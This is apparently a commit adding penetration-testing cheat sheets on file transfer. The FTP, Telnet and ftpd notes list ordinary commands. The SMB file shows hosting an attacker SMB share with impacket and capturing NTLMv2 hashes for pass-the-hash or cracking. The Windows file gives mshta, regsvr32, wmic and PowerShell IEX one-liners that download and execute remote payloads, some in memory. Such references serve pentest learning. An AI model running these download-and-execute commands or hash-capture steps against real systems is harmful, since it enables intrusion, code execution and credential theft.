content-update

docs/File Transfers/FTP.md

@@ -0,0 +1,74 @@
+### FTP - File Transfer Protocol
+
+#### commands
+
+```bash
+ftp ip_address
+#enter username
+#enter password
+
+#print working directory
+pwd
+
+#list file in directory
+ls
+
+#change working directory
+cd /dir/dir
+cd ../dir
+cd ..
+cdup
+
+#creating directory
+mkdir new_dir
+
+#removing directory
+rmdir new_dir
+
+#change transfer mode
+ascii #suitable for transferring text data such as HTML files.
+binary #
+
+#download and upload a file
+get Download.txt
+put Upload.txt
+
+#download upload multiple files
+mget *.txt
+mget file?.txt file?.zip
+mput file.jpg file.jpg
+mput *.zip
+
+#delete file | multiple files
+delete file.zip
+mdelete *.zip
+
+#rename a file
+rename name.txt new_name.txt
+
+# append remote file data
+append new_data.sh old_data.sh
+
+#change file permissions
+chmod 777 file.sh
+chmod +x file.sh
+
+#to exit
+bye
+exit
+quit
+```
+
+#### switches
+
+```bash
+-4	Use only IPv4 to contact any host.
+-6	Use IPv6 only.
+-e	Disables command editing and history support, if it was compiled into the ftp executable. Otherwise, it does nothing.
+-p	Use passive mode for data transfers. Allows the use of ftp in environments where a firewall prevents connections from the outside world back to the client machine. Requires the ftp server to support the PASV command .
+-i	Turns off interactive prompting during multiple file transfers.
+-n	Restrains ftp from attempting auto-login upon initial connection. If auto-login is enabled, ftp checks the .netrc (see netrc ) file in the user’s home directory for an entry describing an account on the remote machine. If no entry exists, ftp prompts for the remote machine login name (the default is the user identity on the local machine), and, if necessary, prompt for a password and an account with which to login.
+-g	Disables file name globbing.
+-v	The verbose option forces ftp to show all responses from the remote server, as well as report on data transfer statistics.
+-d	Enables debugging.
+```

docs/File Transfers/SMB.md

@@ -0,0 +1,25 @@
+### SMB
+```bash
+# Set up a SMB server using smbserver.py from impacket
+smbserver.py SHARE_NAME path/to/share
+
+# From target Windows:
+net view \\KALI_IP
+(Should display the SHARE_NAME)
+
+dir \\KALI_IP\SHARE_NAME
+copy \\KALI_IP\SHARE_NAME\file.exe .
+
+# Looking at smbserver logs you also grab the NTLMv2 hashes of your current Windows user
+# can be usefull to PTH, or crack passwords
+
+# Since Windows 10, you can't do anonymous smb server anymore
+sudo python smbserver.py SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon"
+net use Z: \\192.168.30.130\SDFR /user:peon peon
+net use Z: /delete /y
+```
+
+```bash
+impacket smbserver
+net use z: \\attackerip\sharename
+```

docs/File Transfers/Telnet.md

@@ -0,0 +1,12 @@
+### Telnet
+
+```bash
+telnet ip_address
+ls
+PASV
+TYPE A
+STAT
+get Download.txt
+put Upload.txt
+Exit
+```

docs/File Transfers/Windows mshta wmic regsvr32.md

@@ -0,0 +1,32 @@
+
+### Windows mshta wmic regsvr32
+
+```powershell
+# Method 1
+mshta vbscript:Close(Execute("GetObject(""script:http://IP/payload.sct"")"))
+
+# Method 2
+mshta http://IP/payload.hta
+
+# Method 3 (Using WebDav)
+mshta \\IP\payload.hta
+
+#Download and execute XSL using wmic
+wmic os get /format:"https://webserver/payload.xsl"
+
+
+# Download and execute over a WebServer:
+regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
+
+# Using WebDAV
+regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
+
+# Powershell Cmdlet
+Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"
+
+# Powershell One-Line
+(New-Object System.Net.WebClient).DownloadFile("https://server/filename", "C:\Windows\Temp\filename") 
+
+# In Memory Execution
+IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')
+```

docs/File Transfers/ftpd.md

@@ -0,0 +1,5 @@
+### ftpd
+
+```shell
+/etc/init.d/pure-ftpd
+```